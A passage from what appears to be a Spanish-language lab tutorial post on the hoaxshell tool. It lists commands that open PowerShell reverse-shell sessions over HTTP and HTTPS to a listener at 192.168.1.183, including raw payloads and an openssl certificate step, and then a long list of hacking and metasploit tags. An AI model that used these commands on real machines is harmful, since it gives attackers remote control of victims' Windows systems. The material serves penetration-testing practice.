en http y https. En este caso se usa un payload en powershell

LABORATORIO de PRUEBAS

COMANDOS
Código: Seleccionar todo
Basic shell session over HTTP
python3 hoaxshell.py -s 192.168.1.183 base64 encoded for convenience.
python3 hoaxshell.py -s 192.168.1.183 -r payload raw
whoami
python3 hoaxshell.py -s 192.168.1.183 -x "C:\Users\roger\eia.ps1" "crear archivo"
python3 hoaxshell.py -s 192.168.1.183 -x "E:\videos\2022\Cuartatandafinal\newvideopowershell\ejemplo" "crear archivo"
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 "Crear Certificado"
Encrypted shell session (HTTPS)
python3 hoaxshell.py -s 192.168.1.183 -c cert.pem -k key.pem "ejecutar via https" Encrypted shell session (https)
python3 hoaxshell.py -s 192.168.1.183 -r -c cert.pem -k key.pem "payload raw en https"
https://github.com/t3l3machus/hoaxshell
https://hakin9.org/hoaxshell-an-unconve ... s-traffic/
VIDEO TUTORIAL
reverse-shell
powershell
hacking
python3
penetration-testing
red-teaming
pentesting-tools
Seguridad INFORMATICA
Installation and configuration
Get Full Control On Windows By Browser
How to use
Como usar
Acceder y tener controla total de tu telefono via explorador web
Remotely
Pentesting
framework
python
perl
synology
xpenology
ruby
microsoft windows
Security Technologies
Ransomware
Sistema operativo
Operating Systems
Scanner
Apache
Remote
Remota
Desde Internet
A través de Internet
Instalar
Instalación y configuración
smartphone
Install and configure
acceder a windows con metasploit
atacar ftp con metasploit
explotar ftp con metasploit,ataque a celular android con metasploit
post explotacion con metasploit
establecer una sesion de metasploit
activar escritorio remoto
ataque con metasploit a celular android
explotar vulnerabilidades con metasploit
ataque con metasploit acceder remotamente
instalar kali linux en vmware
kali linux tutorial for beginners
instalar kali linux en virtualbox
registro de windows
comandos
scanner,learn security,unix,ubuntu,debian,OSINT,
oscp certification,ceh,try hack me,hacking,ethical hacker,
ctf for beginners,ehtical hacking,cyber seguridad,security,linux,tool,
penetration tests,herramienta,linux for ethical hackers,BUG,capacitacion,educacion,
How Hackers Do It,cyber security,bug,exploit,tutorial,proteger computadoras,
Information Systems Security Professional,como usar kali linux,metasploit
,LAN,network, https,ssl,http